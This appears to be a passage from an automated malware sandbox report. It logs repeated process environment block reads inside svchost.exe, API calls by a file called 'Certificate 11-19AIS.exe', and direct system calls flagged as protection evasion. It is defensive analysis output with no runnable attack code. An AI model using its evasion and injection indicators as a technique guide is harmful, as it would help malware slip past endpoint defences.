            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007D81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007D8189 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQuerySystemInformation: Direct from: 0x76F148CC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtAllocateVirtualMemory: Direct from: 0x76F148EC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQueryAttributesFile: Direct from: 0x76F12E6C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtReadVirtualMemory: Direct from: 0x76F12E8C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtCreateKey: Direct from: 0x76F12C6C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtSetInformationThread: Direct from: 0x76F12B4C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtClose: Direct from: 0x76F12B6C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtOpenKeyEx: Direct from: 0x76F13C9C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtWriteVirtualMemory: Direct from: 0x76F1490C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtCreateUserProcess: Direct from: 0x76F1371C
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtTerminateThread: Direct from: 0x76F12FCC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtCreateFile: Direct from: 0x76F12FEC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtOpenFile: Direct from: 0x76F12DCC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQueryInformationToken: Direct from: 0x76F12CAC
Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | NtQueryValueKey: Direct from: 0x76F12BEC
